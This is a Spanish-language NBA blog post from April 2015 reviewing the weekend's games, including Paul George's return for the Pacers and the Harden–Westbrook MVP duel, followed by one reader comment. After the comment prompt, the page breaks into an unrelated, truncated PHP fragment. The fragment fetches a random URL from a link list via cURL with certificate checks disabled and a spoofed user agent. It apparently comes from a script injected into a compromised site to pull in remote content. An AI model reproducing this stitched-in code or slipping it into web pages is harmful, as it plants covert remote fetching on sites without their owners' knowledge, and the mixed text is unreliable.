Informe del fin de semana: Vuelve Paul George

06 de April de 2015 por TheDeerHunter

Cual Séptimo de Caballeria, Paul George regresa a las canchas en el tramo postrero de la regular, como la última esperanza de sus Pacers de colarse en el selecto club de equipos que se disputarán el anillo en un par de semanas. Hacemos un breve repaso de lo más relevante que ha tenido lugar en la liga durante este fin de semana.

El viernes vivimos gran partido y triunfo de ambos Gasoles. Con la victoria ante Detroit los Bulls consolidaban el tercer puesto de su conferencia gracias a la derrota de los Raptors en Brooklyn, y Marc protagonizó un bonito duelo ante Kanter logrando infligir la segunda derrota consecutiva a los Thunder. Con la victoria de los Pelicans ante Kings, Westbrook y compañía vuelven a verle las orejas al lobo.
Vimos un tremendo palizón de los Blazers a los Lakers (de 30 puntos) en la que se confirma como la campaña más lamentable de la historia amarilla y también la tunda de los campeones a los Nuggets por idéntica diferencia.
Los Wizards aseguraban su presencia en postemporada ante Knicks; los Bucks frenaban a los Celtics y los Pacers dejaban a los Hornets en 74 para mantener la esperanza de ver a Paul George disputando playoffs.

El sábado el palizón de la noche se lo metían los Hawks a los Nets, igualando su record histórico de victorias, aunque con susto en el cuerpo por lesión de Millsap, a falta de evaluar alcance. Los Heat no eran capaces de aprovechar la derrota de Nets y caían in extremis en Detroit. Sí lo lograban los Celtics que ganaron a Raptors y apuntan seriamente a machada. Los Wizards ponían la guinda a un fin de semana perfecto con su victoria en Memphis. Orlando, por su parte, doblegaron a los Bucks.
En el Oeste los Warriors volvían a demostrar su suficiencia ganando a Dallas. Los Clippers no tuvieron excesivos problemas ante Nuggets. Los Blazers firmaban su 50ª victoria ante Pelicans y los Suns ganaban a los Jazz.

El domingo pudimos disfrutar de un sensacional duelo por el MVP en el que Westbrook se apuntó un nuevo triple doble pero Harden lo ganó a los puntos con sus 41 anotados y la victoria. Vimos el debut de Paul George y vital triunfo de los Pacers sobre los Heat… menudo hueso pueden ser los de Vogel al completo en primera ronda como hipotéticos 8ºs clasificados. También pudimos ver la seria cura de humildad de los campeones a los Warriors en un resultado que no podemos determinar hasta que punto es engañoso.
Los Cavs exhibieron su puntería con 16 triples ante los Bulls y los Clippers humillaron a los Lakers en el derbi angelino más desequilibrado que se recuerda.

Comenta

Un comentario a esta entrada

  1. oli dice:
    #1

    Increíble los triples de Irving y J.R. Smith!!! Dan mucho miedo estos cavs y eso que delante tenían a unos bulls que no se rindieron nunca.

    Y que decir de los spurs no creo que rockets, grizzlies o blazers se los quieran encontrar en primera ronda

    P.d. a ver si se anima el foro que me encanta leer vuestros comentarios!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>